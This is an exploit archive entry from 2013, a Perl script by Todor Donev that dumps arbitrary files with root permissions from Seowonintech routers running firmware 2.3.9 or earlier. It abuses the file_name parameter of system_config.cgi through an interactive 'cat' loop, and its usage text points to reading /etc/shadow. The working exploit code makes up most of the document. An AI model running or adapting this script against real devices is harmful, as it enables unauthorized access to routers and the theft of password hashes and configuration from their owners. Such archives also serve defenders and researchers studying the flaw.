Seowonintech Routers Remote Root File Dumper

2013-06-05T00:00:00
ID 1337DAY-ID-20848
Type zdt
Reporter Todor Donev
Modified 2013-06-05T00:00:00

Description

This exploit dumps an arbitrary file from the filesystem with root level permissions on Seowonintech routers with firmware less than and equal to 2.3.9.

                                        
                                            #!/usr/bin/perl
# 
# [+] Seowonintech routers * <= fw: 2.3.9 remote root file dumper
#
# Author: Todor Donev (todor dot donev at gmail.com)
# Type: Hardware
# Platform: Linux
#
# Special greetz to Stiliyan Angelov, Tsvetelina Emirska and all 
# my friends that support me 
#
# 2013 Bulgaria
# 
use LWP::Simple;
  
my $host  =  $ARGV[0] =~ /^http:\/\// ?  $ARGV[0]:  'http://' . $ARGV[0];
if(not defined $ARGV[0])
{
     usg();
     exit;
}
print "[+] Seowonintech routers * <= fw: 2.3.9 remote root file dumper\n";
$check = $host."/cgi-bin/system_config.cgi";
get($check) || die "[-] Error: $!\n";     
if (defined $check =~ s/\/etc\///gs){
     print "[+] Connected to $ARGV[0]\n";
     print "[+] Exploiting..\n\n";
}
while(1){ 
     print "# cat ";
     chomp($file=<STDIN>);
     $bug = $host."/cgi-bin/system_config.cgi?file_name=".$file."&btn_type=load&action=APPLY";
     if($file eq ""){ print "Enter full path to file!\n"; }
     $data=get($bug) || die "$!, try another exploit\n";
     $data =~ s/Null/File not found!/gs;
     if (defined $data =~ m{rows="30">(.*?)</textarea>}sx){
     print $1."\n";
}}
sub usg
{
     print " [+] Seowonintech routers * <= fw: 2.3.9 remote root file dumper\n";
     print " [?] usg: perl $0 <victim>\n";
     print " [?] exmp xpl usg: perl $0 192.168.1.1 :)\n";
     print " [?] exmp xpl cmd: # cat /etc/shadow :)\n";
     print " [?] The device use Linux.\n";
}

#  0day.today [2018-04-11]  #